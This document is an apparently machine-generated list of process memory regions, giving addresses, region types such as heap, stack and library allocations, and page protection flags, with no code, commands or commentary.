page read and write
10000
heap
page read and write
915000
heap
page read and write
29E0000
trusted library allocation
page read and write
16F000
heap
page read and write
22AB000
trusted library allocation
page read and write
1A57F000
stack
page read and write
1C197000
heap
page read and write
1AC000
heap
page read and write
1CDEB000
stack
page read and write
1CA15000
heap
page read and write
36EB000
trusted library allocation
page read and write
2701000
trusted library allocation
page read and write
584000
heap
page read and write
3781000
heap
page read and write
C0000
trusted library allocation
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
3301000
trusted library allocation
page read and write
4D3D000
heap
page read and write
1BB7B000
heap
page read and write
3212000
trusted library allocation
page read and write
399C000
heap
page read and write
3631000
heap
page read and write
9A0000
heap
page read and write
315B000
trusted library allocation
page read and write
13A000
heap
page read and write
3B40000
trusted library allocation
page read and write
1B8AB000
heap
page read and write
12381000
trusted library allocation
page read and write
39D0000
heap
page read and write
275C000
trusted library allocation
page read and write
4D41000
heap
page read and write
35F8000
heap
page read and write
2351000
trusted library allocation
page read and write
3281000
trusted library allocation
page read and write
2A95000
heap
page read and write
36EB000
trusted library allocation
page read and write
1D60000
direct allocation
page read and write
42EB000
heap
page read and write
1ABF9000
stack
page read and write
390000
heap
page read and write
39B9000
heap
page read and write
417000
heap
page read and write
2480000
heap
page read and write
1A5DB000
heap
page read and write
2DFF000
trusted library allocation
page read and write
7FE8993C000
trusted library allocation
page execute and read and write
3612000
heap
page read and write
2D69000
trusted library allocation
page read and write
508000
heap
page read and write
3B89000
trusted library allocation
page read and write
7FE8989D000
trusted library allocation
page execute and read and write
271D000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
10000
heap
page read and write
408000
stack
page read and write
4A7D000
heap
page read and write
57C000
heap
page read and write
123ED000
trusted library allocation
page read and write
1D10000
heap
page read and write
4A7C000
heap
page read and write
350000
trusted library allocation
page read and write
530000
heap
page read and write
3B5E000
heap
page read and write
366A000
heap
page read and write
2717000
trusted library allocation
page read and write
20000
heap
page read and write
3EE000
heap
page read and write
1C6DF000
stack
page read and write
1B8C0000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
1C4D0000
heap
page read and write
3282000
trusted library allocation
page read and write
3370000
trusted library allocation
page execute
37A0000
trusted library allocation
page read and write
3327000
trusted library allocation
page read and write
4FBB000
heap
page read and write
2D74000
trusted library allocation
page read and write
220000
heap
page read and write
4A7C000
heap
page read and write
2D72000
trusted library allocation
page read and write
407000
heap
page read and write
3B35000
trusted library allocation
page read and write
2D73000
trusted library allocation
page read and write
2418000
heap
page read and write
39C5000
heap
page read and write
2D72000
trusted library allocation
page read and write
3159000
trusted library allocation
page read and write
1B776000
heap
page read and write
30DC000
stack
page read and write
36EB000
trusted library allocation
page read and write
1AD0F000
heap
page read and write
286E000
stack
page read and write
7FE89966000
trusted library allocation
page execute and read and write
392C000
heap
page read and write
11B000
heap
page read and write
D0000
heap
page read and write
7FE89A67000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
3798000
heap
page read and write
12C000
stack
page read and write
4D31000
heap
page read and write
7FE89940000
trusted library allocation
page execute and read and write
39A7000
heap
page read and write
3AE000
stack
page read and write
2E0000
trusted library allocation
page read and write
4FC8000
heap
page read and write
1AE9F000
stack
page read and write
4DE0000
heap
page read and write
122E1000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
1CB13000
heap
page read and write
482000
heap
page read and write
630000
heap
page read and write
379D000
heap
page read and write
1A90A000
stack
page read and write
328A000
trusted library allocation
page read and write
815000
heap
page read and write
37A0000
trusted library allocation
page read and write
1F20000
direct allocation
page read and write
27D000
heap
page read and write
2DFF000
trusted library allocation
page read and write
1A7D4000
heap
page read and write
38FD000
heap
page read and write
5C7000
heap
page read and write
7FE89A88000
trusted library allocation
page read and write
3140000
remote allocation
page read and write
2AD9000
trusted library allocation
page read and write
7FE89A50000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
54E000
stack
page read and write
42A000
heap
page read and write
39B4000
heap
page read and write
2CAA000
stack
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
46E000
heap
page read and write
20D0000
heap
page read and write
7FA000
heap
page read and write
38E2000
heap
page read and write
36EB000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
2E0000
heap
page read and write
328A000
trusted library allocation
page read and write
375F000
stack
page read and write
14B000
heap
page read and write
2381000
trusted library allocation
page read and write
285C000
trusted library allocation
page read and write
7FE89AC0000
trusted library allocation
page read and write
1C3AD000
stack
page read and write
20FF000
stack
page read and write
15D000
heap
page read and write
4B6A000
heap
page read and write
1A6E8000
heap
page execute and read and write
7FE89B00000
trusted library allocation
page read and write
5D4000
heap
page read and write
3D9F000
stack
page read and write
5AF000
heap
page read and write
4D41000
heap
page read and write
52E000
heap
page read and write
42F000
heap
page read and write
328D000
trusted library allocation
page read and write
1CD0000
heap
page read and write
38E000
heap
page read and write
1DF0000
heap
page read and write
4B6A000
heap
page read and write
359B000
heap
page read and write
4A7C000
heap
page read and write
4EC000
heap
page read and write
7FE89C48000
trusted library allocation
page read and write
2FA000
heap
page read and write
4967000
heap
page read and write
35A8000
heap
page read and write
190000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
360000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
1B950000
heap
page read and write
7FE89A42000
trusted library allocation
page read and write
439000
heap
page read and write
1A9A0000
heap
page read and write
460000
trusted library allocation
page read and write
1A857000
heap
page read and write
2DE8000
trusted library allocation
page read and write
7FE8989B000
trusted library allocation
page read and write
5B0000
heap
page read and write
1AD71000
heap
page read and write
7FE89B95000
trusted library allocation
page read and write
1B2CF000
stack
page read and write
426000
heap
page read and write
7FE89AB8000
trusted library allocation
page read and write
2331000
trusted library allocation
page read and write
7FE89970000
trusted library allocation
page execute and read and write
4FF000
heap
page read and write
1E09000
stack
page read and write
4150000
heap
page read and write
1A838000
heap
page read and write
1CF80000
heap
page read and write
1A6E4000
heap
page execute and read and write
2188000
heap
page read and write
580000
direct allocation
page read and write
399E000
heap
page read and write
7FE89936000
trusted library allocation
page read and write
1AA60000
heap
page read and write
39FD000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
39FD000
heap
page read and write
2ADC000
trusted library allocation
page read and write
1B014000
heap
page read and write
4CD1000
heap
page read and write
239F000
stack
page read and write
3285000
trusted library allocation
page read and write
1AA000
heap
page read and write
4E7000
heap
page read and write
5BC000
heap
page read and write
130000
trusted library allocation
page read and write
7FE89A47000
trusted library allocation
page read and write
35C4000
heap
page read and write
1B66F000
stack
page read and write
24A4000
heap
page read and write
42EE000
stack
page read and write
510000
heap
page read and write
2300000
trusted library allocation
page read and write
389000
heap
page read and write
2DFF000
trusted library allocation
page read and write
4FB3000
heap
page read and write
21D0000
heap
page execute and read and write
57C000
heap
page read and write
1C96D000
stack
page read and write
1B73F000
stack
page read and write
3B37000
trusted library allocation
page read and write
322000
heap
page read and write
37A5000
trusted library allocation
page read and write
2D50000
remote allocation
page read and write
1B010000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
3961000
heap
page read and write
4AD000
direct allocation
page read and write
13E000
heap
page read and write
4BFF000
heap
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
1C36B000
heap
page read and write
20000
heap
page read and write
3B7B000
trusted library allocation
page read and write
439000
heap
page read and write
4FF000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
4FC8000
heap
page read and write
1B70000
heap
page read and write
478000
heap
page read and write
2810000
trusted library allocation
page read and write
4BFA000
heap
page read and write
3B37000
heap
page read and write
4959000
heap
page read and write
3140000
remote allocation
page read and write
3FED000
stack
page read and write
436000
heap
page read and write
49D000
heap
page read and write
2B45000
trusted library allocation
page read and write
39D7000
heap
page read and write
48EE000
heap
page read and write
1BFA0000
heap
page read and write
4D41000
heap
page read and write
1BC000
stack
page read and write
113000
heap
page read and write
7FE89C14000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
1C9D0000
heap
page read and write
41FC000
stack
page read and write
33A000
heap
page read and write
2F5000
stack
page read and write
36EB000
trusted library allocation
page read and write
3F4E000
stack
page read and write
3330000
trusted library allocation
page read and write
21C0000
heap
page read and write
3B95000
trusted library allocation
page read and write
130000
heap
page read and write
4D9000
heap
page read and write
4D1D000
heap
page read and write
1A1000
stack
page read and write
78A000
heap
page read and write
4D41000
heap
page read and write
36EB000
trusted library allocation
page read and write
52A000
heap
page read and write
4F7000
heap
page read and write
4D3D000
heap
page read and write
370000
heap
page read and write
2DFF000
trusted library allocation
page read and write
39BE000
heap
page read and write
1AA6D000
heap
page read and write
3B70000
heap
page read and write
37DF000
heap
page read and write
7FE898A0000
trusted library allocation
page read and write
1A688000
stack
page read and write
2080000
heap
page execute and read and write
56C000
heap
page read and write
285E000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
27A5000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
1DC000
stack
page read and write
39BC000
heap
page read and write
39BC000
heap
page read and write
3162000
trusted library allocation
page read and write
2DF5000
trusted library allocation
page read and write
1AFCC000
stack
page read and write
1A760000
heap
page read and write
4B0000
direct allocation
page read and write
177000
heap
page read and write
1CF0000
heap
page read and write
37C0000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
23AD000
trusted library allocation
page read and write
1CAFA000
heap
page read and write
36EB000
trusted library allocation
page read and write
4D0A000
heap
page read and write
439000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
599000
heap
page read and write
4A0000
heap
page read and write
3DEA000
stack
page read and write
56C000
heap
page read and write
4961000
heap
page read and write
3163000
trusted library allocation
page read and write
3B38000
heap
page read and write
25CE000
stack
page read and write
480E000
heap
page read and write
1AD43000
heap
page read and write
4BFA000
heap
page read and write
1BA0000
heap
page read and write
310000
heap
page read and write
1BF8E000
stack
page read and write
7FE89A62000
trusted library allocation
page read and write
3914000
heap
page read and write
20C0000
heap
page read and write
15D000
stack
page read and write
1AD98000
heap
page read and write
3C3D000
heap
page read and write
1FA0000
heap
page read and write
2B3C000
trusted library allocation
page read and write
3151000
trusted library allocation
page read and write
393F000
heap
page read and write
1AA000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
216000
heap
page read and write
459000
system
page execute and read and write
4A7000
heap
page read and write
39AE000
heap
page read and write
7FE89A72000
trusted library allocation
page read and write
482000
heap
page read and write
1B8C9000
heap
page read and write
7FE89A32000
trusted library allocation
page read and write
7FE89C40000
trusted library allocation
page read and write
1B0BB000
stack
page read and write
3B25000
heap
page read and write
13A000
heap
page read and write
4780000
trusted library allocation
page read and write
2DE5000
trusted library allocation
page read and write
3B90000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
7FE89BF3000
trusted library allocation
page read and write
3286000
trusted library allocation
page read and write
1B0AB000
stack
page read and write
1AD73000
heap
page read and write
3931000
heap
page read and write
28C5000
trusted library allocation
page read and write
1B49F000
stack
page read and write
4D2D000
heap
page read and write
2783000
trusted library allocation
page read and write
1A788000
heap
page read and write
1D80000
direct allocation
page read and write
7FE8994C000
trusted library allocation
page execute and read and write
24000
heap
page read and write
2741000
trusted library allocation
page read and write
3932000
heap
page read and write
1A5F5000
heap
page read and write
3ADD000
heap
page read and write
41A000
heap
page read and write
7FE89A88000
trusted library allocation
page read and write
4A07000
heap
page read and write
3287000
trusted library allocation
page read and write
4D20000
heap
page read and write
39B4000
heap
page read and write
39BC000
heap
page read and write
205E000
stack
page read and write
1B570000
heap
page read and write
3D0000
heap
page read and write
1ABBF000
stack
page read and write
1AE8E000
stack
page read and write
1F59000
heap
page read and write
3661000
heap
page read and write
34C0000
trusted library allocation
page read and write
7FE89C34000
trusted library allocation
page read and write
7FE8989B000
trusted library allocation
page read and write
7FE89A3C000
trusted library allocation
page read and write
400000
system
page execute and read and write
7FE89A22000
trusted library allocation
page read and write
4B30000
heap
page read and write
1BA000
heap
page read and write
31C000
stack
page read and write
7FE89892000
trusted library allocation
page read and write
21B0000
heap
page read and write
10000000
direct allocation
page read and write
13510000
trusted library allocation
page read and write
569000
heap
page read and write
1A9EC000
stack
page read and write
456000
system
page execute and read and write
491E000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
7FE89C26000
trusted library allocation
page read and write
4CEA000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
1C7DB000
stack
page read and write
7FE89BB0000
trusted library allocation
page read and write
5C5000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
306000
heap
page read and write
30C000
heap
page read and write
3908000
heap
page read and write
2DFF000
trusted library allocation
page read and write
242000
heap
page read and write
136000
heap
page read and write
4D0E000
heap
page read and write
1AAE9000
stack
page read and write
50E000
heap
page read and write
7FE89A63000
trusted library allocation
page read and write
7FE89A43000
trusted library allocation
page read and write
133CE000
trusted library allocation
page read and write
495B000
heap
page read and write
2D0000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
37D2000
heap
page read and write
7FE89A43000
trusted library allocation
page execute and read and write
990000
heap
page read and write
3B2E000
trusted library allocation
page read and write
1DBB000
heap
page read and write
400000
heap
page read and write
137000
heap
page read and write
2CB000
heap
page read and write
3ED000
heap
page read and write
4D3D000
heap
page read and write
3327000
trusted library allocation
page read and write
2DFF000
trusted library allocation
page read and write
23A1000
trusted library allocation
page read and write
149000
heap
page read and write
12381000
trusted library allocation
page read and write
59B000
direct allocation
page read and write
4CEA000
heap
page read and write
16F000
heap
page read and write
3153000
trusted library allocation
page read and write
7FE89A74000
trusted library allocation
page read and write
149000
heap
page read and write
270C000
trusted library allocation
page read and write
420C000
trusted library allocation
page read and write
2719000
trusted library allocation
page read and write
36EB000
trusted library allocation
page read and write
436000
heap
page read and write
402000
heap
page read and write
584000
heap
page read and write
3E8000
heap
page read and write
1A7000
heap
page read and write
47D000
remote allocation
page execute and read and write
7FE89893000
trusted library allocation
page execute and read and write
26D4000
heap
page read and write
13C000
stack
page read and write
550000
trusted library allocation
page read and write
3A9000
heap
page read and write
2D67000
trusted library allocation
page read and write
1C20000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
1C335000
heap
page read and write
1CD3F000
stack
page read and write
1DA0000
heap
page read and write
392F000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
2D6D000
trusted library allocation
page read and write
389000
heap
page read and write
3945000
heap
page read and write
140000
heap
page read and write
13F000
heap
page read and write
4B6B000
heap
page read and write
3666000
heap
page read and write
3E0D000
stack
page read and write
23A1000
trusted library allocation
page read and write
10000
heap
page read and write
1CB59000
heap
page read and write
12E000
heap
page read and write
3280000
trusted library allocation
page read and write
790000
heap
page read and write
35A0000
heap
page read and write
314000
heap
page read and write
2D50000
remote allocation
page read and write
3278000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
5D9000
heap
page read and write
390D000
heap
page read and write
12470000
trusted library allocation
page read and write
5C0000
heap
page read and write
2860000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
7FE89C20000
trusted library allocation
page read and write
38B0000
trusted library allocation
page read and write
36EB000
trusted library allocation
page read and write
39BA000
heap
page read and write
7FE89C14000
trusted library allocation
page read and write
408000
heap
page read and write
4CD9000
heap
page read and write
3327000
trusted library allocation
page read and write
39B4000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
356000
heap
page read and write
2A0000
heap
page read and write
496D000
heap
page read and write
1D10000
heap
page read and write
496D000
heap
page read and write
4D31000
heap
page read and write
490000
heap
page read and write
571000
heap
page read and write
3960000
heap
page read and write
469000
heap
page read and write
3632000
heap
page read and write
327E000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
45F000
trusted library allocation
page read and write
39BC000
heap
page read and write
1C1F5000
heap
page read and write
7FE89AA0000
trusted library allocation
page execute and read and write
1A8BF000
stack
page read and write
7FE89986000
trusted library allocation
page execute and read and write
7FE89B60000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
37A0000
trusted library allocation
page read and write
3BF000
heap
page read and write
133000
stack
page read and write
548000
heap
page read and write
39FD000
heap
page read and write
20000
heap
page read and write
3FB000
heap
page read and write
1CE7F000
stack
page read and write
12311000
trusted library allocation
page read and write
426000
heap
page read and write
3A01000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
1ADBF000
heap
page read and write
12391000
trusted library allocation
page read and write
1F30000
heap
page read and write
10000
heap
page read and write
1AEC6000
heap
page read and write
39A8000
heap
page read and write
2794000
trusted library allocation
page read and write
3B0000
heap
page read and write
17F000
heap
page read and write
2744000
trusted library allocation
page read and write
1B875000
heap
page read and write
1A7D0000
heap
page read and write
22C9000
stack
page read and write
4D0A000
heap
page read and write
1CF4000
heap
page read and write
47BA000
heap
page read and write
2954000
heap
page read and write
5C7000
heap
page read and write
460000
trusted library allocation
page read and write
7FE89893000
trusted library allocation
page read and write
4D0D000
heap
page read and write
3B1B000
heap
page read and write
3B11000
heap
page read and write
2809000
trusted library allocation
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
16B000
stack
page read and write
7FE89A37000
trusted library allocation
page read and write
48F4000
heap
page read and write
4DA0000
heap
page read and write
13B000
heap
page read and write
12361000
trusted library allocation
page read and write
4CE5000
heap
page read and write
2DFF000
trusted library allocation
page read and write
1C22B000
heap
page read and write
48E6000
heap
page read and write
1C4000
heap
page read and write
1277D000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
315E000
trusted library allocation
page read and write
35F000
trusted library allocation
page read and write
2180000
heap
page read and write
143000
stack
page read and write
10000
heap
page read and write
308000
heap
page read and write
7FE89966000
trusted library allocation
page execute and read and write
2D6D000
trusted library allocation
page read and write
2A68000
trusted library allocation
page read and write
2B1A000
trusted library allocation
page read and write
4951000
heap
page read and write
37A0000
trusted library allocation
page read and write
7FE89C20000
trusted library allocation
page read and write
3CE000
heap
page read and write
2DF5000
trusted library allocation
page read and write
342F000
unkown
page read and write
308000
heap
page read and write
439000
heap
page read and write
3FF0000
trusted library allocation
page read and write
4AD1000
heap
page read and write
29DB000
heap
page read and write
1F87000
direct allocation
page read and write
520000
trusted library allocation
page read and write
1238F000
trusted library allocation
page read and write
4962000
heap
page read and write
4FA7000
heap
page read and write
50E000
heap
page read and write
4BFF000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
680000
heap
page read and write
20000
heap
page read and write
1F97000
direct allocation
page read and write
4E3A000
heap
page read and write
1A6F8000
heap
page execute and read and write
1FCF000
stack
page read and write
1C80000
heap
page execute and read and write
56A000
heap
page read and write
328A000
trusted library allocation
page read and write
4BF7000
heap
page read and write
2D6D000
trusted library allocation
page read and write
1CB05000
heap
page read and write
39E000
heap
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
2D72000
trusted library allocation
page read and write
1AA000
heap
page read and write
4F4000
heap
page read and write
22D0000
heap
page execute and read and write
2D67000
trusted library allocation
page read and write
366B000
heap
page read and write
7FE89B7A000
trusted library allocation
page read and write
37B0000
trusted library allocation
page read and write
4D31000
heap
page read and write
7B0000
heap
page read and write
1D08E000
stack
page read and write
4A80000
heap
page read and write
495F000
heap
page read and write
4A82000
heap
page read and write
1A9DE000
heap
page read and write
1C20000
heap
page execute and read and write
27F000
heap
page read and write
37B9000
heap
page read and write
4DA1000
heap
page read and write
1FA3000
direct allocation
page read and write
1AD16000
heap
page read and write
1C1F0000
heap
page read and write
48EE000
heap
page read and write
153000
heap
page read and write
3AC1000
heap
page read and write
1B1AF000
stack
page read and write
7FE89B40000
trusted library allocation
page read and write
39BA000
heap
page read and write
2ED000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
39B4000
heap
page read and write
122000
heap
page read and write
7FE89C30000
trusted library allocation
page read and write
53F000
heap
page read and write
13A000
heap
page read and write
1C50E000
stack
page read and write
10000
heap
page read and write
575000
heap
page read and write
2DFF000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
159000
heap
page read and write
361F000
heap
page read and write
39BA000
heap
page read and write
1B60F000
stack
page read and write
4A04000
heap
page read and write
39BA000
heap
page read and write
575000
heap
page read and write
7FE89882000
trusted library allocation
page read and write
2D61000
trusted library allocation
page read and write
260000
heap
page read and write
1AD95000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
27F000
trusted library allocation
page read and write
558000
heap
page read and write
4FDC000
heap
page read and write
1A60D000
stack
page read and write
202F000
stack
page read and write
7FE8996C000
trusted library allocation
page execute and read and write
22FE000
stack
page read and write | page guard
3614000
heap
page read and write
2B6C000
trusted library allocation
page read and write
315B000
trusted library allocation
page read and write
2883000
trusted library allocation
page read and write
1C4000
heap
page read and write
4BF7000
heap
page read and write
4BC6000
heap
page read and write
1DE0000
heap
page execute and read and write
1A6F8000
stack
page read and write
4964000
heap
page read and write
3284000
trusted library allocation
page read and write
2D72000
trusted library allocation
page read and write
2E60000
trusted library allocation
page read and write
496E000
heap
page read and write
3761000
heap
page read and write
3A0000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
20000
heap
page read and write
3327000
trusted library allocation
page read and write
3300000
trusted library allocation
page read and write
1A3A0000
heap
page execute and read and write
3799000
trusted library allocation
page read and write
2DFF000
trusted library allocation
page read and write
7FE89C50000
trusted library allocation
page read and write
7FE89930000
trusted library allocation
page read and write
4B30000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
7FE89A94000
trusted library allocation
page read and write
7FE89BF1000
trusted library allocation
page read and write
1C7D3000
heap
page read and write
1B2000
stack
page read and write
2798000
trusted library allocation
page read and write
45D000
system
page execute and read and write
4BFF000
heap
page read and write
438000
heap
page read and write
497000
direct allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
399D000
heap
page read and write
183000
heap
page read and write
220F000
stack
page read and write
72E000
stack
page read and write
1CADB000
heap
page read and write
279E000
stack
page read and write
1DE000
heap
page read and write
318000
heap
page read and write
495B000
heap
page read and write
495F000
heap
page read and write
2DFF000
trusted library allocation
page read and write
1C92C000
stack
page read and write
2585000
trusted library allocation
page read and write
39CA000
heap
page read and write
3590000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
1C7C0000
heap
page read and write
1A3A0000
heap
page read and write
1B90000
heap
page read and write
2DFF000
trusted library allocation
page read and write
2281000
trusted library allocation
page read and write
4FBD000
heap
page read and write
7C4000
heap
page read and write
2887000
trusted library allocation
page read and write
23B000
heap
page read and write
57C000
heap
page read and write
2DF5000
trusted library allocation
page read and write
393F000
heap
page read and write
4E00000
heap
page read and write
37A8000
heap
page read and write
1E70000
heap
page read and write
1F80000
direct allocation
page read and write
2B0000
heap
page read and write
4D0D000
heap
page read and write
56B000
heap
page read and write
10000
heap
page read and write
D0000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
5B7000
heap
page read and write
4D1B000
heap
page read and write
7FE89C50000
trusted library allocation
page read and write
412000
heap
page read and write
24EE000
stack
page read and write
37A5000
trusted library allocation
page read and write
3162000
trusted library allocation
page read and write
410000
heap
page read and write
7FE89956000
trusted library allocation
page read and write
2D3E000
stack
page read and write
3B67000
trusted library allocation
page read and write
1C514000
heap
page read and write
4F0000
heap
page read and write
572000
heap
page read and write
22F0000
trusted library allocation
page read and write
39FB000
heap
page read and write
14B000
heap
page read and write
1C4F8000
heap
page read and write
16E000
heap
page read and write
2B91000
trusted library allocation
page read and write
450000
direct allocation
page read and write
4550000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
5A0000
heap
page read and write
2E8000
stack
page read and write
2D6B000
trusted library allocation
page read and write
3B00000
trusted library allocation
page read and write
2014000
heap
page read and write
1B68E000
stack
page read and write
484A000
heap
page read and write
3724000
heap
page read and write
3420000
trusted library allocation
page read and write
3A80000
heap
page read and write
22C1000
heap
page read and write
1A628000
stack
page read and write
7FE89B70000
trusted library allocation
page read and write
1CAF6000
heap
page read and write
4CD7000
heap
page read and write
312000
heap
page read and write
1ACD0000
heap
page read and write
39A3000
heap
page read and write
36EB000
trusted library allocation
page read and write
1324D000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
36EB000
trusted library allocation
page read and write
4AD1000
heap
page read and write
1B3000
heap
page read and write
2FB000
stack
page read and write
3650000
heap
page read and write
3750000
heap
page read and write
4770000
heap
page read and write
3ED000
stack
page read and write
2D63000
trusted library allocation
page read and write
253000
stack
page read and write
E0000
heap
page read and write
1A5FB000
heap
page read and write
7FE8988D000
trusted library allocation
page execute and read and write
7FE89B50000
trusted library allocation
page read and write
39D8000
heap
page read and write
39AE000
heap
page read and write
7FE89A33000
trusted library allocation
page read and write
1B870000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
1B3CE000
stack
page read and write
23FD000
trusted library allocation
page read and write
1F90000
direct allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
1C524000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
473000
system
page execute and read and write
4E2000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
38D1000
heap
page read and write
2D65000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
4BDA000
heap
page read and write
1BFDB000
heap
page read and write
149000
heap
page read and write
46A000
heap
page read and write
39B4000
heap
page read and write
7FE89946000
trusted library allocation
page read and write
389000
heap
page read and write
4BFA000
heap
page read and write
4DA1000
heap
page read and write
127000
heap
page read and write
37A5000
trusted library allocation
page read and write
266000
heap
page read and write
460000
heap
page read and write
5D0000
heap
page read and write
12291000
trusted library allocation
page read and write
36EB000
trusted library allocation
page read and write
53A000
heap
page read and write
32F000
heap
page read and write
1D80000
direct allocation
page read and write
4A6A000
heap
page read and write
2612000
trusted library allocation
page read and write
12476000
trusted library allocation
page read and write
393F000
heap
page read and write
1C3000
heap
page read and write
3B2C000
heap
page read and write
3B80000
trusted library allocation
page read and write
357D000
heap
page read and write
1C9E4000
heap
page read and write
2D72000
trusted library allocation
page read and write
144000
heap
page read and write
3A00000
heap
page read and write
3BC0000
heap
page read and write
7FE898CB000
trusted library allocation
page read and write
2F0C000
trusted library allocation
page read and write
2DFF000
trusted library allocation
page read and write
145000
heap
page read and write
1CC4000
heap
page read and write
1A9DA000
stack
page read and write
4964000
heap
page read and write
41F000
system
page execute and read and write
2D80000
heap
page read and write
4BFA000
heap
page read and write
496000
heap
page read and write
38F8000
heap
page read and write
10D000
heap
page read and write
1CC5000
heap
page read and write
10000
heap
page read and write
38AF000
stack
page read and write
4FF000
heap
page read and write
7FE8988D000
trusted library allocation
page execute and read and write
2DD000
heap
page read and write
1B1FF000
stack
page read and write
4961000
heap
page read and write
3EA000
heap
page read and write
366A000
heap
page read and write
1A799000
stack
page read and write
3754000
heap
page read and write
474000
remote allocation
page execute and read and write
3327000
trusted library allocation
page read and write
3E6000
heap
page read and write
368000
heap
page read and write
B20000
heap
page read and write
495B000
heap
page read and write
1DF0000
heap
page read and write
551000
heap
page read and write
1A8EE000
heap
page read and write
2DE8000
trusted library allocation
page read and write
4967000
heap
page read and write
1E0000
heap
page read and write
3B5B000
trusted library allocation
page read and write
3FC0000
trusted library allocation
page read and write
280C000
trusted library allocation
page read and write
538000
heap
page read and write
7FE89883000
trusted library allocation
page execute and read and write
7FE89AA0000
trusted library allocation
page read and write
16F000
heap
page read and write
1A7C9000
stack
page read and write
37A5000
trusted library allocation
page read and write
52E0000
heap
page read and write
4AD1000
heap
page read and write
36EB000
trusted library allocation
page read and write
3FF0000
trusted library allocation
page read and write
39FB000
heap
page read and write
1BC000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
39AC000
heap
page read and write
3F5000
heap
page read and write
3590000
heap
page read and write
7FE89940000
trusted library allocation
page execute and read and write
7FE89893000
trusted library allocation
page read and write
132AD000
trusted library allocation
page read and write
10016000
direct allocation
page execute and read and write
1CAAF000
stack
page read and write
2B19000
trusted library allocation
page read and write
37B4000
heap
page read and write
15E000
heap
page read and write
124BD000
trusted library allocation
page read and write
2950000
heap
page read and write
7FE89950000
trusted library allocation
page execute and read and write
4D9000
heap
page read and write
1BC6000
heap
page read and write
1A90C000
heap
page read and write
3B8000
stack
page read and write
315F000
trusted library allocation
page read and write
265000
heap
page read and write
12301000
trusted library allocation
page read and write
106000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
1CC0000
heap
page read and write
1C9CC000
stack
page read and write
3FFC000
stack
page read and write
122000
heap
page read and write
39A7000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
5C90000
trusted library allocation
page read and write
1ADAE000
stack
page read and write
39A8000
heap
page read and write
54C000
heap
page read and write
575000
heap
page read and write
1CC0000
heap
page read and write
3327000
trusted library allocation
page read and write
4D8000
heap
page read and write
45C000
system
page execute and read and write
14A000
heap
page read and write
22DA000
trusted library allocation
page read and write
7FE89A33000
trusted library allocation
page read and write
148000
heap
page read and write
22C8000
heap
page read and write
1AA5A000
stack
page read and write
1B8BE000
stack
page read and write
583000
direct allocation
page read and write
35A1000
heap
page read and write
2D69000
trusted library allocation
page read and write
39AE000
heap
page read and write
1A56D000
stack
page read and write
3799000
trusted library allocation
page read and write
3771000
heap
page read and write
2837000
trusted library allocation
page read and write
413000
heap
page read and write
39E1000
heap
page read and write
270000
trusted library allocation
page read and write
5A5000
heap
page read and write
7FE89936000
trusted library allocation
page read and write
538000
heap
page read and write
37A5000
trusted library allocation
page read and write
359B000
heap
page read and write
1CC50000
heap
page read and write
399D000
heap
page read and write
1317D000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
30C000
heap
page read and write
1B640000
heap
page read and write
1AED6000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
5C90000
trusted library allocation
page read and write
1D14000
heap
page read and write
106000
heap
page read and write
1CC1F000
stack
page read and write
570000
heap
page read and write
7FE89B30000
trusted library allocation
